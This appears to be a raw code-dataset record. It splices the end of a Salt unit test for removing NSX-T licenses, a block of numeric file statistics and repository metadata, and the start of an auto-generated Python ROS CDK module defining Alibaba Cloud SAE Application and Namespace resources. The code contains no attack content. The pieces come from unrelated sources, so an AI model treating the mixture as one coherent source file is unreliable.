mock_delete_license = MagicMock(return_value=delete_license_data)
with patch.dict(
nsxt_license.__salt__,
{
"nsxt_license.get_licenses": mock_get_licenses,
"nsxt_license.delete_license": mock_delete_license,
},
):
ret["result"] = False
ret["comment"] = (
"Failed to retrieve licenses after deleting current license from NSX-T Manager : "
"Error occurred while retrieving the license. Please check logs for more details."
)
with patch.dict(nsxt_license.__opts__, {"test": False}):
assert (
nsxt_license.absent("delete-license", "hostname", "admin", "password", "dummy-key")
== ret
)
| 35.50497
| 110
| 0.553222
| 1,843
| 17,859
| 5.106348
| 0.064569
| 0.072468
| 0.038253
| 0.036128
| 0.937732
| 0.925938
| 0.918925
| 0.910318
| 0.906705
| 0.900542
| 0
| 0.00366
| 0.326838
| 17,859
| 502
| 111
| 35.575697
| 0.779155
| 0.076656
| 0
| 0.711584
| 0
| 0
| 0.325871
| 0.028153
| 0
| 0
| 0
| 0
| 0.028369
| 1
| 0.030733
| false
| 0.028369
| 0.009456
| 0.002364
| 0.042553
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a6db2d2817bb2866834a8673cd3aa3a1d70a8776
| 113,051
|
py
|
Python
|
multiple-languages/python/ros-cdk-sae-1.0.4/src/ros_cdk_sae/__init__.py
|
piotr-kalanski/Resource-Orchestration-Service-Cloud-Development-Kit
|
2a12deea757ac69e69708dd9fd159fba12cfba0e
|
[
"Apache-2.0"
] | null | null | null |
multiple-languages/python/ros-cdk-sae-1.0.4/src/ros_cdk_sae/__init__.py
|
piotr-kalanski/Resource-Orchestration-Service-Cloud-Development-Kit
|
2a12deea757ac69e69708dd9fd159fba12cfba0e
|
[
"Apache-2.0"
] | null | null | null |
multiple-languages/python/ros-cdk-sae-1.0.4/src/ros_cdk_sae/__init__.py
|
piotr-kalanski/Resource-Orchestration-Service-Cloud-Development-Kit
|
2a12deea757ac69e69708dd9fd159fba12cfba0e
|
[
"Apache-2.0"
] | null | null | null |
'''
## Aliyun ROS SAE Construct Library
This module is part of the AliCloud ROS Cloud Development Kit (ROS CDK) project.
```python
import * as SAE from '@alicloud/ros-cdk-sae';
```
'''
import abc
import builtins
import datetime
import enum
import typing
import jsii
import publication
import typing_extensions
from ._jsii import *
import ros_cdk_core
class Application(
ros_cdk_core.Resource,
metaclass=jsii.JSIIMeta,
jsii_type="@alicloud/ros-cdk-sae.Application",
):
'''A ROS resource type: ``ALIYUN::SAE::Application``.'''
def __init__(
self,
scope: ros_cdk_core.Construct,
id: builtins.str,
props: "ApplicationProps",
enable_resource_property_constraint: typing.Optional[builtins.bool] = None,
) -> None:
'''Create a new ``ALIYUN::SAE::Application``.
Param scope - scope in which this resource is defined
Param id - scoped id of the resource
Param props - resource properties
:param scope: -
:param id: -
:param props: -
:param enable_resource_property_constraint: -
'''
jsii.create(self.__class__, self, [scope, id, props, enable_resource_property_constraint])
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrAppId")
def attr_app_id(self) -> ros_cdk_core.IResolvable:
'''Attribute AppId: Creating successful application ID.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrAppId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrChangeOrderId")
def attr_change_order_id(self) -> ros_cdk_core.IResolvable:
'''Attribute ChangeOrderId: Return to release a single ID, used to query task execution status.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrChangeOrderId"))
@jsii.data_type(
jsii_type="@alicloud/ros-cdk-sae.ApplicationProps",
jsii_struct_bases=[],
name_mapping={
"app_name": "appName",
"cpu": "cpu",
"memory": "memory",
"namespace_id": "namespaceId",
"package_type": "packageType",
"replicas": "replicas",
"app_description": "appDescription",
"command": "command",
"command_args": "commandArgs",
"custom_host_alias": "customHostAlias",
"deploy": "deploy",
"edas_container_version": "edasContainerVersion",
"envs": "envs",
"image_url": "imageUrl",
"jar_start_args": "jarStartArgs",
"jar_start_options": "jarStartOptions",
"jdk": "jdk",
"liveness": "liveness",
"mount_desc": "mountDesc",
"mount_host": "mountHost",
"nas_id": "nasId",
"package_url": "packageUrl",
"package_version": "packageVersion",
"post_start": "postStart",
"pre_stop": "preStop",
"readiness": "readiness",
"security_group_id": "securityGroupId",
"sls_configs": "slsConfigs",
"tags": "tags",
"timezone": "timezone",
"vpc_id": "vpcId",
"v_switch_id": "vSwitchId",
"war_start_options": "warStartOptions",
"web_container": "webContainer",
},
)
class ApplicationProps:
def __init__(
self,
*,
app_name: typing.Union[builtins.str, ros_cdk_core.IResolvable],
cpu: typing.Union[jsii.Number, ros_cdk_core.IResolvable],
memory: typing.Union[jsii.Number, ros_cdk_core.IResolvable],
namespace_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
package_type: typing.Union[builtins.str, ros_cdk_core.IResolvable],
replicas: typing.Union[jsii.Number, ros_cdk_core.IResolvable],
app_description: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
command: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
command_args: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
custom_host_alias: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
deploy: typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]] = None,
edas_container_version: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
envs: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
image_url: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
jar_start_args: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
jar_start_options: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
jdk: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
liveness: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
mount_desc: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
mount_host: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
nas_id: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
package_url: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
package_version: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
post_start: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
pre_stop: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
readiness: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
security_group_id: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
sls_configs: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
tags: typing.Optional[typing.Sequence["RosApplication.TagsProperty"]] = None,
timezone: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
vpc_id: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
v_switch_id: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
war_start_options: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
web_container: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
) -> None:
'''Properties for defining a ``ALIYUN::SAE::Application``.
:param app_name: Property appName: Application Name. Allowed numbers, letters and underlined combinations thereof. We must begin with the letters, the maximum length of 36 characters.
:param cpu: Property cpu: Each instance of the CPU required, in units of milli core, can not be zero. Currently only supports fixed specifications instance type.
:param memory: Property memory: Each instance of the required memory, in units of MB, can not be zero. Currently only supports fixed specifications instance type.
:param namespace_id: Property namespaceId: EDAS namespace corresponding to ID. Canada supports only the name of the scribe lowercase namespace must begin with a letter. Namespace can interface to obtain from DescribeNamespaceList.
:param package_type: Property packageType: Application package type. Support FatJar, War, Image.
:param replicas: Property replicas: The initial number of instances.
:param app_description: Property appDescription: Application description. No more than 1024 characters.
:param command: Property command: Mirroring the start command. The command object in memory executable container must be. For example: sleep. This command will cause the image to set the original startup command failure.
:param command_args: Property commandArgs: Mirroring the start command parameters. Parameters required for the start-command. For example: [ "1d"]
:param custom_host_alias: Property customHostAlias: Custom mapping host vessel. For example: [{ "hostName": "samplehost", "ip": "127.0.0.1"}]
:param deploy: Property deploy: Whether deployed immediately take effect, the default is false.
:param edas_container_version: Property edasContainerVersion: EDAS pandora runtime environment used by the application.
:param envs: Property envs: Container environment variable parameters. For example: [{ "name": "envtmp", "value": "0"}]
:param image_url: Property imageUrl: Mirroring address. Image only type of application can be configured to mirror address.
:param jar_start_args: Property jarStartArgs: Jar package startup application parameters. Apply the default startup command: $ JAVA_HOME / bin / java $ JarStartOptions -jar $ CATALINA_OPTS "$ package_path" $ JarStartArgs
:param jar_start_options: Property jarStartOptions: Jar start the application package option. Apply the default startup command: $ JAVA_HOME / bin / java $ JarStartOptions -jar $ CATALINA_OPTS "$ package_path" $ JarStartArgs
:param jdk: Property jdk: Deployment of JDK version of the package depends on. Mirroring not supported.
:param liveness: Property liveness: Container health check, health check fails container will be killed and recovery. Currently only supports mode command issued in the container. The columns: { "exec": { "command": [ "sleep", "5s"]}, "initialDelaySeconds": 10, "timeoutSeconds": 11}
:param mount_desc: Property mountDesc: Mount Description.
:param mount_host: Property mountHost: nas mount point in the application of vpc.
:param nas_id: Property nasId: Mount the NAS ID, you must be in the same region and cluster. It must be available to create a mount point limit, or switch on its mount point already in the VPC. If you do not fill, and there mountDescs field, the default will automatically purchase a NAS and mount it onto the switch within the VPC.
:param package_url: Property packageUrl: Deployment packages address. Only FatJar War or the type of application can be configured to deploy packet address.
:param package_version: Property packageVersion: The version number of the deployed package, War FatJar type required. Please customize it meaning.
:param post_start: Property postStart: Executing the script, such as after starting the format: { "exec": { "command": "cat", "/ etc / group"}}.
:param pre_stop: Property preStop: Script is executed before stopping the format as: { "exec": { "command": "cat", "/ etc / group"}}.
:param readiness: Property readiness: Application launch status check, health check fails repeatedly container will be killed and restarted. Do not pass health check of the vessel will not have to enter SLB traffic. For example: { "exec": { "command": [ "sleep", "6s"]}, "initialDelaySeconds": 15, "timeoutSeconds": 12}
:param security_group_id: Property securityGroupId: Security group ID.
:param sls_configs: Property slsConfigs: Log collection configuration file.
:param tags: Property tags: Tags to attach to application. Max support 20 tags to add during create application. Each tag with two properties Key and Value, and Key is required.
:param timezone: Property timezone: Application time zone. Default Asia/Shanghai.
:param vpc_id: Property vpcId: EDAS namespace corresponding VPC. In Serverless in a corresponding one of the VPC namespace only, and can not be modified. Serverless first created in the application name space will form a binding relationship. You may correspond to a plurality of namespaces VPC. Do not fill was VpcId namespace binding.
:param v_switch_id: Property vSwitchId: Application examples where the elastic card virtual switch. The switch must be located above the VPC. The same switch with EDAS namespace binding relationship. Do not fill was VSwitchId namespace binding.
:param war_start_options: Property warStartOptions: War Start the application package option. Apply the default startup command: java $ JAVA_OPTS $ CATALINA_OPTS -Options org.apache.catalina.startup.Bootstrap "$ @" start
:param web_container: Property webContainer: Tomcat deployment of the package depends on the version. Mirroring not supported.
'''
self._values: typing.Dict[str, typing.Any] = {
"app_name": app_name,
"cpu": cpu,
"memory": memory,
"namespace_id": namespace_id,
"package_type": package_type,
"replicas": replicas,
}
if app_description is not None:
self._values["app_description"] = app_description
if command is not None:
self._values["command"] = command
if command_args is not None:
self._values["command_args"] = command_args
if custom_host_alias is not None:
self._values["custom_host_alias"] = custom_host_alias
if deploy is not None:
self._values["deploy"] = deploy
if edas_container_version is not None:
self._values["edas_container_version"] = edas_container_version
if envs is not None:
self._values["envs"] = envs
if image_url is not None:
self._values["image_url"] = image_url
if jar_start_args is not None:
self._values["jar_start_args"] = jar_start_args
if jar_start_options is not None:
self._values["jar_start_options"] = jar_start_options
if jdk is not None:
self._values["jdk"] = jdk
if liveness is not None:
self._values["liveness"] = liveness
if mount_desc is not None:
self._values["mount_desc"] = mount_desc
if mount_host is not None:
self._values["mount_host"] = mount_host
if nas_id is not None:
self._values["nas_id"] = nas_id
if package_url is not None:
self._values["package_url"] = package_url
if package_version is not None:
self._values["package_version"] = package_version
if post_start is not None:
self._values["post_start"] = post_start
if pre_stop is not None:
self._values["pre_stop"] = pre_stop
if readiness is not None:
self._values["readiness"] = readiness
if security_group_id is not None:
self._values["security_group_id"] = security_group_id
if sls_configs is not None:
self._values["sls_configs"] = sls_configs
if tags is not None:
self._values["tags"] = tags
if timezone is not None:
self._values["timezone"] = timezone
if vpc_id is not None:
self._values["vpc_id"] = vpc_id
if v_switch_id is not None:
self._values["v_switch_id"] = v_switch_id
if war_start_options is not None:
self._values["war_start_options"] = war_start_options
if web_container is not None:
self._values["web_container"] = web_container
@builtins.property
def app_name(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''Property appName: Application Name.
Allowed numbers, letters and underlined combinations thereof. We must begin with the letters, the maximum length of 36 characters.
'''
result = self._values.get("app_name")
assert result is not None, "Required property 'app_name' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def cpu(self) -> typing.Union[jsii.Number, ros_cdk_core.IResolvable]:
'''Property cpu: Each instance of the CPU required, in units of milli core, can not be zero.
Currently only supports fixed specifications instance type.
'''
result = self._values.get("cpu")
assert result is not None, "Required property 'cpu' is missing"
return typing.cast(typing.Union[jsii.Number, ros_cdk_core.IResolvable], result)
@builtins.property
def memory(self) -> typing.Union[jsii.Number, ros_cdk_core.IResolvable]:
'''Property memory: Each instance of the required memory, in units of MB, can not be zero.
Currently only supports fixed specifications instance type.
'''
result = self._values.get("memory")
assert result is not None, "Required property 'memory' is missing"
return typing.cast(typing.Union[jsii.Number, ros_cdk_core.IResolvable], result)
@builtins.property
def namespace_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''Property namespaceId: EDAS namespace corresponding to ID.
Canada supports only the name of the scribe lowercase namespace must begin with a letter.
Namespace can interface to obtain from DescribeNamespaceList.
'''
result = self._values.get("namespace_id")
assert result is not None, "Required property 'namespace_id' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def package_type(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''Property packageType: Application package type.
Support FatJar, War, Image.
'''
result = self._values.get("package_type")
assert result is not None, "Required property 'package_type' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def replicas(self) -> typing.Union[jsii.Number, ros_cdk_core.IResolvable]:
'''Property replicas: The initial number of instances.'''
result = self._values.get("replicas")
assert result is not None, "Required property 'replicas' is missing"
return typing.cast(typing.Union[jsii.Number, ros_cdk_core.IResolvable], result)
@builtins.property
def app_description(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property appDescription: Application description.
No more than 1024 characters.
'''
result = self._values.get("app_description")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def command(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property command: Mirroring the start command.
The command object in memory executable container must be. For example: sleep. This command will cause the image to set the original startup command failure.
'''
result = self._values.get("command")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def command_args(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property commandArgs: Mirroring the start command parameters.
Parameters required for the start-command. For example: [ "1d"]
'''
result = self._values.get("command_args")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def custom_host_alias(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property customHostAlias: Custom mapping host vessel.
For example: [{ "hostName": "samplehost", "ip": "127.0.0.1"}]
'''
result = self._values.get("custom_host_alias")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def deploy(
self,
) -> typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]]:
'''Property deploy: Whether deployed immediately take effect, the default is false.'''
result = self._values.get("deploy")
return typing.cast(typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]], result)
@builtins.property
def edas_container_version(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property edasContainerVersion: EDAS pandora runtime environment used by the application.'''
result = self._values.get("edas_container_version")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def envs(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property envs: Container environment variable parameters.
For example: [{ "name": "envtmp", "value": "0"}]
'''
result = self._values.get("envs")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def image_url(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property imageUrl: Mirroring address.
Image only type of application can be configured to mirror address.
'''
result = self._values.get("image_url")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def jar_start_args(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property jarStartArgs: Jar package startup application parameters.
Apply the default startup command: $ JAVA_HOME / bin / java $ JarStartOptions -jar $ CATALINA_OPTS "$ package_path"
$ JarStartArgs
'''
result = self._values.get("jar_start_args")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def jar_start_options(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property jarStartOptions: Jar start the application package option.
Apply the default startup command: $ JAVA_HOME / bin / java $ JarStartOptions -jar $ CATALINA_OPTS "$ package_path"
$ JarStartArgs
'''
result = self._values.get("jar_start_options")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def jdk(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property jdk: Deployment of JDK version of the package depends on.
Mirroring not supported.
'''
result = self._values.get("jdk")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def liveness(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property liveness: Container health check, health check fails container will be killed and recovery.
Currently only supports mode command issued in the container. The columns: { "exec": { "command": [ "sleep", "5s"]}, "initialDelaySeconds": 10, "timeoutSeconds": 11}
'''
result = self._values.get("liveness")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def mount_desc(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property mountDesc: Mount Description.'''
result = self._values.get("mount_desc")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def mount_host(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property mountHost: nas mount point in the application of vpc.'''
result = self._values.get("mount_host")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def nas_id(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property nasId: Mount the NAS ID, you must be in the same region and cluster.
It must be available to create a mount point limit, or switch on its mount point already in the VPC. If you do not fill, and there mountDescs field, the default will automatically purchase a NAS and mount it onto the switch within the VPC.
'''
result = self._values.get("nas_id")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def package_url(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property packageUrl: Deployment packages address.
Only FatJar War or the type of application can be configured to deploy packet address.
'''
result = self._values.get("package_url")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def package_version(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property packageVersion: The version number of the deployed package, War FatJar type required.
Please customize it meaning.
'''
result = self._values.get("package_version")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def post_start(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property postStart: Executing the script, such as after starting the format: { "exec": { "command": "cat", "/ etc / group"}}.'''
result = self._values.get("post_start")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def pre_stop(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property preStop: Script is executed before stopping the format as: { "exec": { "command": "cat", "/ etc / group"}}.'''
result = self._values.get("pre_stop")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def readiness(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property readiness: Application launch status check, health check fails repeatedly container will be killed and restarted.
Do not pass health check of the vessel will not have to enter SLB traffic. For example: { "exec": { "command": [ "sleep", "6s"]}, "initialDelaySeconds": 15, "timeoutSeconds": 12}
'''
result = self._values.get("readiness")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def security_group_id(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property securityGroupId: Security group ID.'''
result = self._values.get("security_group_id")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def sls_configs(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property slsConfigs: Log collection configuration file.'''
result = self._values.get("sls_configs")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def tags(self) -> typing.Optional[typing.List["RosApplication.TagsProperty"]]:
'''Property tags: Tags to attach to application.
Max support 20 tags to add during create application. Each tag with two properties Key and Value, and Key is required.
'''
result = self._values.get("tags")
return typing.cast(typing.Optional[typing.List["RosApplication.TagsProperty"]], result)
@builtins.property
def timezone(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property timezone: Application time zone.
Default Asia/Shanghai.
'''
result = self._values.get("timezone")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def vpc_id(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property vpcId: EDAS namespace corresponding VPC.
In Serverless in a corresponding one of the VPC namespace only, and can not be modified. Serverless first created in the application name space will form a binding relationship. You may correspond to a plurality of namespaces VPC. Do not fill was VpcId namespace binding.
'''
result = self._values.get("vpc_id")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def v_switch_id(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property vSwitchId: Application examples where the elastic card virtual switch.
The switch must be located above the VPC. The same switch with EDAS namespace binding relationship. Do not fill was VSwitchId namespace binding.
'''
result = self._values.get("v_switch_id")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def war_start_options(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property warStartOptions: War Start the application package option.
Apply the default startup command: java $ JAVA_OPTS $ CATALINA_OPTS -Options org.apache.catalina.startup.Bootstrap "$ @" start
'''
result = self._values.get("war_start_options")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def web_container(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property webContainer: Tomcat deployment of the package depends on the version.
Mirroring not supported.
'''
result = self._values.get("web_container")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "ApplicationProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class Namespace(
ros_cdk_core.Resource,
metaclass=jsii.JSIIMeta,
jsii_type="@alicloud/ros-cdk-sae.Namespace",
):
'''A ROS resource type: ``ALIYUN::SAE::Namespace``.'''
def __init__(
self,
scope: ros_cdk_core.Construct,
id: builtins.str,
props: "NamespaceProps",
enable_resource_property_constraint: typing.Optional[builtins.bool] = None,
) -> None:
'''Create a new ``ALIYUN::SAE::Namespace``.
Param scope - scope in which this resource is defined
Param id - scoped id of the resource
Param props - resource properties
:param scope: -
:param id: -
:param props: -
:param enable_resource_property_constraint: -
'''
jsii.create(self.__class__, self, [scope, id, props, enable_resource_property_constraint])
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrNamespaceId")
def attr_namespace_id(self) -> ros_cdk_core.IResolvable:
'''Attribute NamespaceId: Namespace ID.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrNamespaceId"))
@jsii.data_type(
jsii_type="@alicloud/ros-cdk-sae.NamespaceProps",
jsii_struct_bases=[],
name_mapping={
"namespace_id": "namespaceId",
"namespace_name": "namespaceName",
"namespace_description": "namespaceDescription",
},
)
class NamespaceProps:
def __init__(
self,
*,
namespace_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
namespace_name: typing.Union[builtins.str, ros_cdk_core.IResolvable],
namespace_description: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
) -> None:
'''Properties for defining a ``ALIYUN::SAE::Namespace``.
:param namespace_id: Property namespaceId: Namespace ID. Format: "regionId:logicalId" or "logicalId"
:param namespace_name: Property namespaceName: Namespace name.
:param namespace_description: Property namespaceDescription: Namespace description.
'''
self._values: typing.Dict[str, typing.Any] = {
"namespace_id": namespace_id,
"namespace_name": namespace_name,
}
if namespace_description is not None:
self._values["namespace_description"] = namespace_description
@builtins.property
def namespace_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''Property namespaceId: Namespace ID.
Format: "regionId:logicalId" or "logicalId"
'''
result = self._values.get("namespace_id")
assert result is not None, "Required property 'namespace_id' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def namespace_name(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''Property namespaceName: Namespace name.'''
result = self._values.get("namespace_name")
assert result is not None, "Required property 'namespace_name' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def namespace_description(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property namespaceDescription: Namespace description.'''
result = self._values.get("namespace_description")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "NamespaceProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class RosApplication(
ros_cdk_core.RosResource,
metaclass=jsii.JSIIMeta,
jsii_type="@alicloud/ros-cdk-sae.RosApplication",
):
'''A ROS template type: ``ALIYUN::SAE::Application``.'''
def __init__(
self,
scope: ros_cdk_core.Construct,
id: builtins.str,
props: "RosApplicationProps",
enable_resource_property_constraint: builtins.bool,
) -> None:
'''Create a new ``ALIYUN::SAE::Application``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param enable_resource_property_constraint: -
'''
jsii.create(self.__class__, self, [scope, id, props, enable_resource_property_constraint])
@jsii.member(jsii_name="renderProperties")
def _render_properties(
self,
props: typing.Mapping[builtins.str, typing.Any],
) -> typing.Mapping[builtins.str, typing.Any]:
'''
:param props: -
'''
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))
@jsii.python.classproperty # type: ignore[misc]
@jsii.member(jsii_name="ROS_RESOURCE_TYPE_NAME")
def ROS_RESOURCE_TYPE_NAME(cls) -> builtins.str:
'''The resource type name for this resource class.'''
return typing.cast(builtins.str, jsii.sget(cls, "ROS_RESOURCE_TYPE_NAME"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrAppId")
def attr_app_id(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: AppId: Creating successful application ID.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrAppId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrChangeOrderId")
def attr_change_order_id(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: ChangeOrderId: Return to release a single ID, used to query task execution status.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrChangeOrderId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="rosProperties")
def _ros_properties(self) -> typing.Mapping[builtins.str, typing.Any]:
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.get(self, "rosProperties"))
@builtins.property # type: ignore[misc]
